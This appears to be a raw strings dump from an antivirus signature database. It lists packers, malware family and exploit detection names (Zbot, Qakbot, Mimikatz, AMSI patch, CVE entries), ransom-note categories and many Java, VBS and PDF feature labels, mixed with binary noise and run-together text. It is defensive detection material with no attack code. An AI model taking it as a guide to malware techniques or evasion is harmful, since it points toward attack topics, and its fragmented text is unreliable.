!Petite_v23L1_9 !Petite_v23L1_9 hddf`P VjPWjjVjPW !PrivateEXE_1_7 !PrivateEXE_1_7 !RarDefault_330 !RarDefault_330 !RarDefault_390 !RarDefault_390 !SimplePack_1.x !SimplePack_1.x \tujhhj !BeRoExePacker_v1` !#FOP:NeoreklamiEP1 !#FOP:NeoreklamiEP2 !#FOP:Obfuscator.ESSVQ u3AJu !#FOP:SmrtInstMkrCab !#FOP:Trojan:Win32/Vundo.D@@@@@@ HHHHHHHHHHH !#Lowfi:FOP:Chroject_Decrypt !#Rovnix_DropperhV !#Rovnix_DropperhV !#Rovnix_Dropperhj !#Rovnix_Dropperhj !#Rovnix_Dropper !#Rovnix_Dropper !#do_deep_rescan` !#do_deep_rescan` !#do_deep_rescanjj !#do_deep_rescanjj !#do_deep_rescan fhhhhh !PolyCrypt_2_1_4 !PolyCrypt_2_1_4 !unk_aPLib_based_^ !unk_aPLib_based_^ !LightyCompressorU 1jhhjhj hhjhj !#attrmatch_codepatch_EIP_0000000A_8BD83C 4'\t!#attrmatch_codepatch_EIP_0000000A_8BD83C !Aspack_v1084 5 $!Aspack_v1084 !#FOP:Win32/NuwarU !#FOP:Win32/NuwarU VSUW1 !#FOP:Win32/Nuwar !BeRoExePacker_v1`hhh !BeRoExePacker_v1`hhh !BeRoExePacker_v1` !CabSfxW_4a1ba5bdVUh !CabSfxW_4a1ba5bdVUh !EXECryptor_2.x.xVWS1 !EXECryptor_2.x.xVWS1 !EXECryptor_2.x.xYX[ !EXECryptor_2.x.xYX[ !EXECryptor_2.x.x !EXECryptor_2.x.x !LightyCompressorU !GoatPEMutilator_1_6`j !#FOP:TrojanSpy:Win32/Nivdort.Q2 !!#FOP:Win32/Nuwar !#FOP:Expiro.gen!E`U !#FOP:Expiro.gen!E`U !YingInstall_v5800h !YingInstall_v5800h !eXPressor_1.5.0.1 !eXPressor_1.5.0.1 ujhhj 5%!\t\t1 Rhhjhj !#LowFi:Win32/Upatre_SendMsg !#VirTool:Win32/Obfuscator_LOD.Ah 6% \"!#FOP:Win32/Nuwar !#FOP:Deep_Analysis3 !#FOP:Deep_Analysis3 !#FOP:Deep_AnalysisU !#FOP:Deep_Analysisj j3SSj !#FOP:Deep_Analysis !#FOP:Obfuscator.GS !#FOP:Obfuscator.GS S39VWt !#FOP:PrivacyCenter9 !#FOP:PrivacyCenter9 !#FOP:Win32/EyeStye !#FOP:Win32/EyeStye 5|Sf[RS~ [ZSUsS !#FOP:Win32/Induc.BU !#FOP:Win32/Induc.BU jjIuQ !#FOP:Zbot_Packer_A3G !#FOP:Zbot_Packer_A3G !#FOP:Zbot_Packer_A3 !#FOP:Zbot_Packer_A3 u@=u3MMMH s2%%%H u@3=u3 u@=u399 !#FOP:Zbot_Packer_AU hjjhjj !#FOP:Zbot_Packer_A[C !#FOP:Zbot_Packer_A[C !#FOP:Zbot_Packer_A`hV^Z !#FOP:Zbot_Packer_A`hV^Z !#FOP:Zbot_Packer_A !``aa 3=u3XXXS !#Rovnix_Dropper_v2 !#Rovnix_Dropper_v2 !#do_vmmgrow_rescanU !#do_vmmgrow_rescanU !#do_vmmgrow_rescan !1\tA!hj !wintrim_obfuscator !wintrim_obfuscator !#FOP:zbot_deep_analysisV 1Uhdd 1ZYYd !#FOP:Trojan:Win32/Tibs.LC !#VirTool:Win32/Obfuscator_LOD.A !#attrmatch_codepatch_EIP_0000001A_EB !#attrmatch_codepatch_EIP_00000020_01h !#attrmatch_codepatch_EIP_0000001C_9090 !#Cmdline_Obfuscator !#Cmdline_Obfuscator !#FOP:Win32/Bankrypt0@ !#FOP:Win32/Bankrypt0@ !ApplibDecompression !ApplibDecompression !MuckisProtector_2_0 !MuckisProtector_2_0 !kkrunchy_0.23_alpha !kkrunchy_0.23_alpha !#Rogue:Win32/Winwebsec !#FOP:Virus:Win32/Golem.G2 !#FOP:Virus:Win32/FakeExplorer.A` yyyyyyyy cyyyyyyyy !#FOP:Virus:Win32/FakeExplorer.B` cyyyyyyyyyyyyy !#FOP:TrojanDownloader:Win32/Delf.CS B@Nuj !#FOP:TrojanDownloader:Win32/Agent.IXU !#FOP:TrojanDownloader:Win32/Fudyut.A 9a78a3096eae C:\\temp\\myapp.exe 9cb32eb20f6a e078d0ee7f7c !#do_exhaustivehstr_rescanObMpAttributes isparanoid MpEnableExhaustiveDexScanning 15b303e55775 2345soft \t2345soft 15b3319e6605 15b34c11459d 15b398af535b 437856ff197a 4a78439ec610 4d41c420cfea executble_image 5a78ec245280 63782f027c75 6878cb96a614 6b8d611167ec PUA:Block:Bundlore.R 6c41b11326ff 72789adece0e 7378a0e4e532 7378d53e7000 7878943c0364 79784bda1deb 7a7839a9fbf9 7b78fd6741ee 8778f6a1a1f5 93788d81fc95 9a78c569af86 9c789ba67cbf a278eb5c64c5 b3781dd9330f b978418de539 b978e4cfedfc bf78f78b13bb c078d32aab93 f178f3690e1c 1789628cbfbb 3789452d8575 3db34fab1a32 steam.exe 40896a40f234 88613c3b1784 ->(Upxw64) HSTR:HackTool:Win64/MikatzUPX 8f7813ecdbb5 ad787dbad042 securityOffset e1b3d9f5af93 \\%l%l%l%l%l%l%l%l.exe e478a5dbb5a0 4d298c9ac9fe 4d298c9ac9feIncludesResearchData websettings.xml.rels 4f296cf42557 4f296cf42557IncludesResearchData 4f29f2a5bdc8 4f29f2a5bdc8IncludesResearchData 5029fd12dcc8 5029fd12dcc8IncludesResearchData 52294ab098ab 52294ab098abIncludesResearchData 53297a0e29c4 53297a0e29c4IncludesResearchData 5329db9de718 5329db9de718IncludesResearchData 8329fbb676fc 8329fbb676fcIncludesResearchData 1257898c5dd76 1338dcf1b5461 PUA:Block:Bundlore.P 13a7895eea07a 14f78d0c64e0e 18a61067a4815 1d4781d20490a HSTR:JAVA:Feature:M:688 SIGATTR:Java:Throwable.getMessage SCPT:PostScript_forall SIGATTR:Java:Long.parseLong HSTR:JAVA:Feature:C:634 HSTR:JAVA:Feature:C:15 HSTR:JAVA:Feature:C:614 SIGATTR:Java:ByteArrayOutputStream.close SIGATTR:Java:File.getAbsolutePath SIGATTR:Java:MessageDigest.update SIGATTR:Java:AccessController.doPrivileged SIGATTR:Java:Object.wait SIGATTR:Java:SecureRandom.nextBytes SIGATTR:Java:ObjectInputStream.defaultReadObject HSTR:JAVA:Feature:C:144 HSTR:JAVA:Feature:M:160 BRUTE:VBS:Feature:M:783 BRUTE:VBS:Feature:C:267 HSTR:JAVA:Feature:C:284 SCPT:Exploit:O97M/CVE-2017-11882.APR1!MTB SCPT:Exploit:O97M/CVE-2017-11882.YA7!MTB SCRIPT:Exploit:Win32/CVE-2015-1641-4 BRUTE:JAMSI:Feature:C:144 SIGATTR:Java:Toolkit.getDefaultToolkit SCPT:RansomNoteCat3_19 SIGATTR:Java:String.split SIGATTR:Java:ObjectInputStream.readObject SIGATTR:Java:Method.getReturnType HSTR:JAVA:Feature:C:548 BRUTE:VBS:Feature:M:511 SIGATTR:Java:String.valueOf SIGATTR:Java:Long.toString SIGATTR:Java:Boolean.valueOf HSTR:JAVA:Feature:C:354 BRUTE:VBS:Feature:M:706 SIGATTR:Java:ByteBuffer.putInt SIGATTR:Java:Cipher.init BRUTE:VBS:Feature:C:43 HSTR:JAVA:Feature:C:520 BRUTE:VBS:Feature:M:283 BRUTE:VBS:Feature:C:689 HSTR:JAVA:Feature:C:161 HSTR:JAVA:Feature:C:200 BRUTE:PDF:Feature:C:720 BRUTE:VBS:Feature:M:675 flafisiX SIGATTR:Java:String.toCharArray BRUTE:VBS:Feature:C:185 Script:Phish:HTTPS/Mitargcro.S201 AGGR:Phish:HTTPS/Mitargcro.S200 BRUTE:VBS:Feature:C:435 HSTR:JAVA:Feature:M:205 BRUTE:VBS:Feature:M:150 HSTR:JAVA:Feature:C:356 BRUTE:VBS:Feature:C:450 SIGATTR:Java:Hashtable.get HSTR:JAVA:Feature:C:367 SCRIPT:Psloadlib.A HSTR:JAVA:Feature:C:96 HSTR:JAVA:Feature:C:119 SCPT:RansomNoteCat4_50 SIGATTR:Java:DataOutputStream.writeByte HSTR:JAVA:Feature:C:517 HSTR:JAVA:Feature:C:295 BRUTE:VBS:Feature:M:349 AGGR:Lua:JarClassFilesInsideGE25 SIGATTR:Java:Field.getType SIGATTR:Java:Class.getPackage HSTR:JAVA:Feature:C:164 BRUTE:PDF:Feature:M:589 SIGATTR:Java:MessageDigest.getInstance HSTR:JAVA:Feature:C:370 SIGATTR:Java:String.startsWith BRUTE:PDF:Feature:C:178 HSTR:JAVA:Feature:M:623 BRUTE:VBS:Feature:C:295 HSTR:JAVA:Feature:C:538 SCPT:VBSExe SCPT:Adodb.vbsexe HSTR:JAVA:Feature:C:612 HSTR:JAVA:Feature:C:145 BRUTE:VBS:Feature:C:217 SCPT:ClnWordsCat2_39 HSTR:JAVA:Feature:M:622 HSTR:JAVA:Feature:C:13 BRUTE:VBS:Feature:M:246 HSTR:JAVA:Feature:M:196 SIGATTR:Java:Method.getDeclaringClass HSTR:JAVA:Feature:C:180 HSTR:JAVA:Feature:C:259 SCPT:Ping SIGATTR:Java:String.contains SIGATTR:Java:InetAddress.getHostAddress SIGATTR:Java:AudioFormat.getSampleRate SIGATTR:Java:JPanel.add SIGATTR:Java:AudioFormat.getFrameSize HSTR:JAVA:Feature:C:482 BRUTE:VBS:Feature:M:618 ATTR:RPF:ZipZipExt SIGATTR:Java:InputStream.close SIGATTR:Java:Writer.write BRUTE:JAMSI:Feature:M:66 SCPT:Hostname BRUTE:VBS:Feature:M:137 SCPT:TrojanDownloader:O97M/Obfuse.JQ1 SIGATTR:Java:System.nanoTime HSTR:JAVA:Feature:C:564 HSTR:JAVA:Feature:C:400 HSTR:JAVA:Feature:C:286 BRUTE:VBS:Feature:M:56 BRUTE:VBS:Feature:M:395 BRUTE:JAMSI:Expert:Feature:58 BRUTE:VBS:Feature:C:354 HSTR:JAVA:Feature:M:108 HSTR:JAVA:Feature:M:675 HSTR:JAVA:Feature:C:66 HSTR:JAVA:Feature:M:515 SIGATTR:Java:PrivilegedActionException.getException SIGATTR:Java:System.getProperty SCPT:HPDockStationFirmware.p1 HSTR:JAVA:Feature:C:70 HSTR:JAVA:Feature:M:640 SIGATTR:Java:DataBuffer.setElem SIGATTR:Java:Math.abs BRUTE:VBS:Feature:M:766 HSTR:JAVA:Feature:M:685 BRUTE:VBS:Feature:M:310 HSTR:JAVA:Feature:M:308 SCPT:GeneralityExploitStrRare.C SIGATTR:Java:Character.toUpperCase HSTR:JAVA:Feature:C:312 HSTR:JAVA:Feature:M:45 SIGATTR:Java:Container.add HSTR:JAVA:Feature:C:588 SIGATTR:Java:Math.sqrt HSTR:JAVA:Feature:C:628 BRUTE:VBS:Feature:C:682 BRUTE:JAMSI:Feature:M:224 SIGATTR:Java:Cipher.doFinal HSTR:JAVA:Feature:C:512 HSTR:JAVA:Feature:C:437 BRUTE:VBS:Feature:C:761 BRUTE:VBS:Feature:M:548 SIGATTR:Java:Class.getMethod HSTR:JAVA:Feature:C:509 SIGATTR:Java:HttpURLConnection.setDoOutput SIGATTR:Java:InetAddress.getLocalHost SIGATTR:Java:LinkedList.isEmpty SIGATTR:Java:IOException.printStackTrace BRUTE:PDF:Feature:C:222 HSTR:JAVA:Feature:M:641 HSTR:JAVA:Feature:M:223 SIGATTR:Java:Reflect_Method.invoke HSTR:JAVA:Feature:C:84 SIGATTR:Java:String.indexOf SIGATTR:Java:HashMap.remove SCPT:VBSForEach SIGATTR:Java:BigInteger.toByteArray BRUTE:VBS:Feature:C:95 HSTR:JAVA:Feature:C:252 SIGATTR:Java:Class.toString HSTR:JAVA:Feature:C:646 BRUTE:VBS:Feature:M:711 SIGATTR:Java:IOException.toString ExceptionExt BRUTE:VBS:Feature:C:282 SCPT:RansomNoteCat4_30 SIGATTR:Java:Reflect_Field.set BRUTE:VBS:Feature:C:437 SCRIPT:FlashExp_writebyte SCRIPT:Exploit:SWF/Netis.B-2 HSTR:JAVA:Feature:C:38 BRUTE:JAMSI:Feature:C:93 SIGATTR:Java:String.format HSTR:JAVA:Feature:C:551 HSTR:JAVA:Feature:C:581 ML:LUA:FileSizeLE400.A HSTR:JAVA:Feature:C:329 SIGATTR:Java:SecurityManager.checkPermission SIGATTR:Java:OutputStream.write HSTR:JAVA:Feature:M:8 HSTR:JAVA:Feature:M:684 SIGATTR:Java:Method.invoke BRUTE:Exploit:Java/CVE-2008-5353.C3 BRUTE:VBS:Feature:M:544 SCPT:LNK/EvalAttr HSTR:JAVA:Feature:C:601 SIGATTR:Java:Field.set HSTR:JAVA:Feature:C:165 HSTR:JAVA:Feature:C:151 BRUTE:VBS:Feature:C:91 SIGATTR:Java:Class.forName SIGATTR:Java:DataOutputStream.write BRUTE:JAMSI:Feature:C:266 SIGATTR:Java:Class.getClassLoader BRUTE:JAMSI:Feature:M:278 AGGR:AlreadyExistInstaller AGGR:GenericInstallerFile HSTR:JAVA:Feature:C:61 SIGATTR:Java:Math.log HSTR:JAVA:Feature:M:18 BRUTE:VBS:Feature:C:113 SCPT:O97M/Trickbot.VAR4!MTB SCPT:TrojanDownloader:O97M/Zloader.STO3 BRUTE:PDF:Feature:M:728 BRUTE:VBS:Feature:M:528 SIGATTR:Java:Graphics2D.draw HSTR:JAVA:Feature:M:402 Exploit:Java/CVE-2013-1493.INIT AGGR:ExcelSiorType.B SIGATTR:Java:ColorConvertOp.filter SIGATTR:Java:Integer.toString SIGATTR:Java:Method.getParameterTypes HSTR:JAVA:Feature:C:244 BRUTE:PDF:Feature:M:105 ExcelSiorType.C HSTR:JAVA:Feature:M:243 SCPT:PDF.HasImage SCRIPT:Psmarshal.A HSTR:JAVA:Feature:C:373 BRUTE:VBS:Feature:C:227 BRUTE:PDF:Feature:C:702 SCPT:JS/BASE64.function.A SCPT:JS/Return HSTR:JAVA:Feature:M:178 BRUTE:JAMSI:Feature:M:235 BRUTE:PDF:Feature:M:353 BRUTE:JAMSI:Feature:C:133 BRUTE:PDF:Feature:M:479 BRUTE:VBS:Feature:M:84 HSTR:JAVA:Feature:M:174 SCRIPT:base64 HSTR:JAVA:Feature:C:59 SCPT:RansomNoteCat4_48 SIGATTR:Java:Math.sin SCPT:Linux/Trojan.mal_attr_ChmodToExec HSTR:JAVA:Feature:M:589 HSTR:JAVA:Feature:C:130 BRUTE:VBS:Feature:C:272 HSTR:JAVA:Feature:C:74 BRUTE:JAMSI:Feature:M:225 BRUTE:VBS:Feature:M:458 HSTR:JAVA:Feature:M:122 SIGATTR:Java:Expression.getValue SIGATTR:Java:Thread.getContextClassLoader HSTR:JAVA:Feature:C:404 BRUTE:VBS:Feature:C:477 HSTR:JAVA:Feature:C:500 SIGATTR:Java:Integer.intValue HSTR:Trojan:Java/ZKM HSTR:JAVA:Feature:C:228 SIGATTR:Java:ICC_Profile.getInstance BRUTE:PDF:Feature:M:160 BRUTE:VBS:Feature:C:540 HSTR:JAVA:Feature:C:502 BRUTE:VBS:Feature:C:527 SIGATTR:Java:Socket.getInputStream BRUTE:VBS:Feature:C:183 SIGATTR:Java:LinkedList.add BRUTE:VBS:Feature:C:292 HSTR:JAVA:Feature:M:287 HSTR:JAVA:Feature:M:220 SCPT:TrojanDownloader:O97M/Qakbot.PJI6!MTB BRUTE:VBS:Feature:M:817 HSTR:JAVA:Feature:C:303 BRUTE:PDF:Feature:M:153 SIGATTR:Java:Method.getModifiers SIGATTR:Java:Long.longValue BRUTE:PDF:Feature:M:162 SCPT:JS/copyright SCPT:GeneralityExploitStrRare.V SCPT:ClnWordsCat1_2 BRUTE:VBS:Feature:M:431 HSTR:JAVA:Feature:C:446 BRUTE:VBS:Feature:M:102 BRUTE:VBS:Feature:M:69 BRUTE:PDF:Feature:M:648 HSTR:JAVA:Feature:C:235 SCPT:JS/license SCPT:VBSCLicense SCPT:ClnWordsCat2_47 SCPT:RansomNoteCat4_34 HSTR:JAVA:Feature:M:57 BRUTE:PDF:Feature:M:810 SCPT:RansomNoteCat4_2 SCPT:RansomNoteCat1_3 HSTR:JAVA:Feature:C:310 BRUTE:JAMSI:Feature:M:109 HSTR:JAVA:Feature:M:411 HSTR:JAVA:Feature:C:330 BRUTE:VBS:Feature:M:546 SIGATTR:Java:ByteBuffer.allocate SIGATTR:Java:Object.hashCode BRUTE:VBS:Feature:C:518 SIGATTR:Java:Double.parseDouble SIGATTR:Java:LinkedList.iterator SCPT:RansomNoteCat2_3 HSTR:JAVA:Feature:C:63 BRUTE:JAMSI:Feature:C:155 SIGATTR:Java:Field.get HSTR:JAVA:Feature:M:508 BRUTE:VBS:Feature:M:642 HSTR:JAVA:Feature:C:237 SIGATTR:Java:ByteBuffer.put SIGATTR:Java:PrintStream.print BRUTE:JAMSI:Feature:M:91 HSTR:JAVA:Feature:C:24 HSTR:JAVA:Feature:M:32 HSTR:JAVA:Feature:C:85 HSTR:JAVA:Feature:M:313 BRUTE:VBS:Feature:C:368 Lua:FileBaseFolderInCdrive HSTR:JAVA:Feature:M:352 SIGATTR:Java:Reflect_Field.get HSTR:JAVA:Feature:C:291 HSTR:JAVA:Feature:C:570 HSTR:JAVA:Feature:C:208 Exception:Masquerading.EA BRUTE:VBS:Feature:M:204 HSTR:JAVA:Feature:C:297 BRUTE:JAMSI:Feature:C:49 SCRIPT:FlashExp_blowfish SIGATTR:Java:Statement.execute SCPT:hidden BRUTE:LNK:Expert:Feature:239 SIGATTR:Java:Math.min BRUTE:JAMSI:Feature:C:134 HSTR:JAVA:Feature:C:138 BRUTE:JAMSI:Expert:Feature:63 HSTR:JAVA:Feature:C:556 SCPT:Phish:PHP/Loader.GG SIGATTR:Java:Character.isWhitespace BRUTE:VBS:Feature:M:513 HSTR:JAVA:Feature:M:670 SIGATTR:Java:WritableRaster.getDataBuffer SIGATTR:Java:Object.notify HSTR:JAVA:Feature:M:458 BRUTE:VBS:Feature:C:116 BRUTE:VBS:Feature:C:156 HSTR:JAVA:Feature:C:183 BRUTE:VBS:Feature:C:248 BRUTE:VBS:Feature:C:347 BRUTE:VBS:Feature:C:346 HSTR:JAVA:Feature:M:660 HSTR:JAVA:Feature:M:46 HSTR:JAVA:Feature:C:438 SIGATTR:Java:Method.getName BRUTE:Python/Leivion.B.Len HSTR:JAVA:Feature:M:124 HSTR:JAVA:Feature:C:266 BRUTE:PDF:Feature:C:555 HSTR:JAVA:Feature:C:443 ALF:AGGR:Vampa:99!ml SIGATTR:Java:FileOutputStream.write BRUTE:VBS:Feature:M:677 BRUTE:VBS:Feature:C:665 HSTR:JAVA:Feature:C:64 BRUTE:JAMSI:Feature:C:258 HSTR:JAVA:Feature:C:345 HSTR:JAVA:Feature:M:595 BRUTE:VBS:Feature:C:209 HSTR:JAVA:Feature:C:421 SCPT:TrojanDownloader:O97M/Obfuse.PKV6!MTB SCPT:RansomNoteCat4_32 BRUTE:VBS:Feature:C:580 BRUTE:VBS:Feature:M:685 HSTR:JAVA:Feature:M:106 BRUTE:VBS:Feature:C:441 HSTR:JAVA:Feature:M:501 BRUTE:PDF:Feature:C:305 SIGATTR:Java:Socket.close BRUTE:JAMSI:Feature:C:97 SIGATTR:Java:File.length SIGATTR:Java:URLEncoder.encode HSTR:JAVA:Feature:M:186 BRUTE:LNK:Expert:Feature:109 SIGATTR:Java:StringTokenizer.hasMoreTokens BRUTE:PDF:Feature:C:299 HSTR:JAVA:Feature:C:466 HSTR:JAVA:Feature:M:315 SCPT:RansomNoteCat4_10 HSTR:JAVA:Feature:C:197 SCPT:RansomNoteCat2_9 ML:LUA:FileSizeLE1000.A BRUTE:VBS:Feature:C:488 HSTR:JAVA:Feature:M:69 BRUTE:VBS:Feature:M:22 BRUTE:VBS:Feature:C:708 BRUTE:VBS:Feature:M:259 SIGATTR:Java:Class.getConstructor SCPT:AutoItApi_IsArray HSTR:JAVA:Feature:M:353 HSTR:JAVA:Feature:M:209 BRUTE:LNK:Expert:Feature:42 BRUTE:JAMSI:FuncN:13 SIGATTR:Java:String.trim BRUTE:LNK:Expert:Feature:30 SCPT:LNK/http HSTR:JAVA:Feature:M:211 BRUTE:PDF:Feature:M:431 BRUTE:PDF:Feature:C:747 HSTR:JAVA:Feature:M:249 BRUTE:LNK:Expert:Feature:140 BRUTE:VBS:Feature:C:18 SIGATTR:Java:String.getBytes HSTR:JAVA:Feature:M:27 HSTR:JAVA:Feature:C:49 SCPT:AmsiPatch.A4 HSTR:JAVA:Feature:C:691 HSTR:JAVA:Feature:C:540 BRUTE:VBS:Feature:M:363 SCRIPT:VBSRun BRUTE:VBS:Feature:C:142 BRUTE:PDF:Feature:M:723 HSTR:Zkm_Decoder BRUTE:VBS:Feature:C:646 BRUTE:PDF:Feature:C:46 BRUTE:JAMSI:Feature:C:187 SIGATTR:Java:Class.getResource BRUTE:VBS:Feature:M:73 SIGATTR:Java:System.exit HSTR:JAVA:Feature:M:322 SIGATTR:Java:Throwable.printStackTrace HSTR:JAVA:Feature:C:655 BRUTE:JAMSI:Feature:C:190 SIGATTR:Java:Logger.getLogger BRUTE:PDF:Feature:C:814 HSTR:JAVA:Feature:M:11 HSTR:JAVA:Feature:C:477 SIGATTR:Java:Class.isArray SIGATTR:Java:ByteArrayOutputStream.toByteArray BRUTE:LNK:Expert:Feature:183 BRUTE:VBS:Feature:C:339 SCPT:AutoItApi_String BRUTE:PDF:Feature:C:145 BRUTE:VBS:Feature:C:302 HSTR:JAVA:Feature:C:575 HSTR:JAVA:Feature:C:279 SIGATTR:Java:File.createNewFile SIGATTR:Java:String.compareTo SIGATTR:Java:File.getParentFile SLF:Context/NonPeExtractedFileInArchive.B!jar Lua:NonPeExtractedFileInArchive.B HSTR:JAVA:Feature:C:140 BRUTE:PDF:Feature:M:553 HSTR:JAVA:Feature:M:621 HSTR:JAVA:Feature:C:362 HSTR:JAVA:Feature:M:563 HSTR:JAVA:Feature:M:254 ALF:AGGR:Vampa:90!ml SIGATTR:Java:File.getPath ALF:AGGR:Vampa:80!ml SIGATTR:Java:Arrays.fill HSTR:JAVA:Feature:M:111 BRUTE:JAMSI:Feature:C:68 HSTR:JAVA:Feature:C:654 HSTR:JAVA:Feature:M:527 HSTR:JAVA:Feature:M:555 BRUTE:VBS:Feature:C:251 SIGATTR:Java:DataOutputStream.writeInt HSTR:JAVA:Feature:M:121 SIGATTR:Java:Graphics.drawImage SIGATTR:Java:File.delete SIGATTR:Java:Class.isPrimitive HSTR:JAVA:Feature:M:377 Lua:FileSizeLT2000 SIGATTR:Java:InetAddress.getAddress SCPT:ClnWordsCat2_13 HSTR:JAVA:Feature:C:671 BRUTE:PDF:Feature:M:444 BRUTE:VBS:Feature:C:424 Trojan:O97M/Donoff.Y4 BRUTE:VBS:Feature:C:86 BRUTE:PDF:Feature:M:632 VirTool:Java/Obfuscator.A HSTR:JAVA:Feature:M:553 BRUTE:PDF:Feature:M:42 SIGATTR:Java:Arrays.asList SIGATTR:Java:StackTraceElement.getMethodName SIGATTR:Java:BufferedOutputStream.write BRUTE:VBS:Feature:M:495 HSTR:JAVA:Feature:M:261 SIGATTR:Java:Class.getDeclaredFields SIGATTR:Java:Float.floatValue HSTR:JAVA:Feature:M:572 SIGATTR:Java:Array.newInstance SCPT:RansomNoteCat3_33 SIGATTR:Java:Object.toString BRUTE:VBS:Feature:C:403 BRUTE:VBS:Feature:C:72 HSTR:JAVA:Feature:M:250 HSTR:JAVA:Feature:C:105 BRUTE:JAMSI:Feature:C:71 HSTR:JAVA:Feature:C:215 HSTR:JAVA:Feature:M:73 SCRIPT:StringDisplayName.A BRUTE:VBS:Feature:M:564 BRUTE:VBS:Feature:M:353 SIGATTR:Java:File.getParent HSTR:JAVA:Feature:M:585 SCPT:RansomNoteCat4_40 BRUTE:VBS:Feature:M:799 HSTR:JAVA:Feature:M:229 SCPT:TrojanDownloader:O97M/Zloader.STO8 HSTR:JAVA:Feature:M:292 SIGATTR:Java:File.mkdirs SIGATTR:Java:File.isFile SCPT:Backdoor:Php/Dirtelti.GG15 SIGATTR:Java:OutputStream.flush BRUTE:JAMSI:Feature:C:299 BRUTE:Exploit:Java/CVE-2008-5353.C1 SIGATTR:Java:HashMap.put BRUTE:JAMSI:Feature:C:186 SCRIPT:PHP/GetEnv!MTB SIGATTR:Java:StringBuffer.reverse BRUTE:VBS:Feature:C:335 BRUTE:VBS:Feature:M:158 SIGATTR:Java:Exception.getMessage SIGATTR:Java:File.isDirectory HSTR:JAVA:Feature:C:285 SCPT:RansomNoteCat4_21 SIGATTR:Java:PrintWriter.write SCRIPT:CMDString BRUTE:LNK:Expert:Feature:53 BRUTE:VBS:Feature:C:519 HSTR:JAVA:Feature:C:490 HSTR:JAVA:Feature:C:129 BRUTE:LNK:Expert:Feature:83 SCPT:Backdoor:ASP/Dirtelti.K4!MTB SCRIPT:AMSITest2 SCPT:Backdoor:ASP/Dirtelti.G6!MTB BRUTE:PDF:Feature:C:756 BRUTE:LNK:Expert:Feature:136 SCPT:LNK/FunAttr SIGATTR:Java:Statement.getMethodName HSTR:JAVA:Feature:C:434 HSTR:JAVA:Feature:C:380 BRUTE:VBS:Feature:M:345 SCPT:Phish:PHP/Created.GG HSTR:JAVA:Feature:C:409 SIGATTR:Java:StackTraceElement.getClassName BRUTE:LNK:Expert:Feature:208 BRUTE:JAMSI:Feature:C:243 SIGATTR:Java:Math.random SIGATTR:Java:Class.newInstance SCPT:RansomNoteCat4_15 BRUTE:VBS:Feature:C:338 BRUTE:VBS:Feature:C:337 HSTR:JAVA:Feature:M:332 BRUTE:VBS:Feature:C:123 dHSTR:JAVA:Feature:M:688SIGATTR:Java:Throwable.getMessageBRUTE:VBS:Feature:M:762SCPT:PostScript_forallSIGATTR:Java:Long.parseLongHSTR:JAVA:Feature:C:634HSTR:JAVA:Feature:C:15HSTR:JAVA:Feature:C:614SIGATTR:Java:ByteArrayOutputStream.closeSIGATTR:Java:File.getAbsolutePathSIGATTR:Java:MessageDigest.updateSIGATTR:Java:AccessController.doPrivilegedSIGATTR:Java:Object.waitSIGATTR:Java:SecureRandom.nextBytesSIGATTR:Java:ObjectInputStream.defaultReadObjectHSTR:JAVA:Feature:C:144HSTR:JAVA:Feature:M:160BRUTE:VBS:Feature:M:783BRUTE:VBS:Feature:C:267HSTR:JAVA:Feature:C:284SCPT:Exploit:O97M/CVE-2017-11882.APR1!MTBSCPT:Exploit:O97M/CVE-2017-11882.YA7!MTBSCRIPT:Exploit:Win32/CVE-2015-1641-4BRUTE:VBS:Feature:C:793BRUTE:JAMSI:Feature:C:144SIGATTR:Java:Toolkit.getDefaultToolkitSCPT:RansomNoteCat3_19SIGATTR:Java:String.splitSIGATTR:Java:ObjectInputStream.readObjectSIGATTR:Java:Method.getReturnTypeHSTR:JAVA:Feature:C:548BRUTE:VBS:Feature:M:511SIGATTR:Java:String.valueOfSIGATTR:Java:Long.toStringSIGATTR:Java:Boolean.valueOfHSTR:JAVA:Feature:C:354BRUTE:VBS:Feature:M:706SIGATTR:Java:ByteBuffer.putIntSIGATTR:Java:Cipher.initBRUTE:VBS:Feature:C:43HSTR:JAVA:Feature:C:520BRUTE:VBS:Feature:M:283BRUTE:JAMSI:Feature:M:45BRUTE:VBS:Feature:C:689HSTR:JAVA:Feature:C:161HSTR:JAVA:Feature:C:200BRUTE:PDF:Feature:C:720BRUTE:VBS:Feature:M:675BRUTE:PDF:Feature:C:520flafisiXSIGATTR:Java:String.toCharArrayBRUTE:VBS:Feature:C:185Script:Phish:HTTPS/Mitargcro.S201AGGR:Phish:HTTPS/Mitargcro.S200BRUTE:VBS:Feature:C:435Trojan:HTML/Phish!attr02HSTR:JAVA:Feature:M:205BRUTE:VBS:Feature:M:150HSTR:JAVA:Feature:C:356SLF:MpCloudToVDMBloomFilter.ABRUTE:VBS:Feature:C:450BRUTE:VBS:Feature:C:753SIGATTR:Java:Hashtable.getHSTR:JAVA:Feature:C:367SCRIPT:Psloadlib.AHSTR:JAVA:Feature:C:96HSTR:JAVA:Feature:C:119SCPT:RansomNoteCat4_50SIGATTR:Java:DataOutputStream.writeByteHSTR:JAVA:Feature:C:517HSTR:JAVA:Feature:C:295BRUTE:VBS:Feature:M:349AGGR:Lua:JarClassFilesInsideGE25SIGATTR:Java:Field.getTypeSIGATTR:Java:Class.getPackageHSTR:JAVA:Feature:C:164BRUTE:PDF:Feature:M:589SIGATTR:Java:MessageDigest.getInstanceHSTR:JAVA:Feature:C:370SIGATTR:Java:String.startsWithBRUTE:PDF:Feature:C:178HSTR:JAVA:Feature:M:623BRUTE:VBS:Feature:C:295HSTR:JAVA:Feature:C:538SCPT:VBSExeSCPT:Adodb.vbsexeHSTR:JAVA:Feature:C:612HSTR:JAVA:Feature:C:145BRUTE:VBS:Feature:C:217SCPT:ClnWordsCat2_39HSTR:JAVA:Feature:M:622HSTR:JAVA:Feature:C:13BRUTE:JAMSI:Feature:C:303BRUTE:VBS:Feature:M:246AGGR:WebMailInEmailHSTR:JAVA:Feature:M:196SIGATTR:Java:Method.getDeclaringClassHSTR:JAVA:Feature:C:180HSTR:JAVA:Feature:C:259SCPT:PingSIGATTR:Java:String.containsSIGATTR:Java:InetAddress.getHostAddressBRUTE:VBS:Feature:M:110SIGATTR:Java:AudioFormat.getSampleRateSIGATTR:Java:JPanel.addSIGATTR:Java:AudioFormat.getFrameSizeHSTR:JAVA:Feature:C:482BRUTE:VBS:Feature:M:618ATTR:RPF:ZipZipExtBRUTE:LNK:Expert:Feature:47SIGATTR:Java:InputStream.closeSIGATTR:Java:Writer.writeBRUTE:JAMSI:Feature:M:66SCPT:HostnameBRUTE:VBS:Feature:M:137SCPT:TrojanDownloader:O97M/Obfuse.JQ1BRUTE:VBS:Feature:M:715SIGATTR:Java:System.nanoTimeHSTR:JAVA:Feature:C:564HSTR:J